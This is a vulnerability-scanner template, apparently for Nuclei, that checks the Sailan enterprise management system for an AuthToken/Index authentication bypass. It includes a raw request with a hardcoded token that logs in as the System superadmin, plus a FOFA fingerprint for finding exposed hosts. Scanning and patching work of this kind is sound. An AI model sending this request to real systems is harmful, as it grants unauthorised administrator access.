http:
    - matchers:
        - part: body
          type: word
          words:
            - /Home6/AdminPretty
        - status:
            - 302
          type: status
      matchers-condition: and
      raw:
        - |
          GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
          Host: {{Hostname}}
id: sailan-AuthToken_Index-Authentication-bypass
info:
    author: Superhero
    description: |-
        fofa: body="/Home6/AdminPretty"
        赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞，未授权的远程攻击者可以利用此接口构造token绕过身份认证，使用超级管理员账户登录系统后台，造成信息泄露或者恶意破坏，使系统处于极不安全的状态。
    name: 赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486057&idx=1&sn=5574dd73cf13eb58748b39156bfd5946&chksm=c267bf5af510364c048a1df89e9c5337a91a3bc4a495832290a61be3d588598f331d74222c5d&token=2024266625&lang=zh_CN#rd
    severity: high
    tags:
        - Authentication bypass
        - 赛蓝企业管理系统
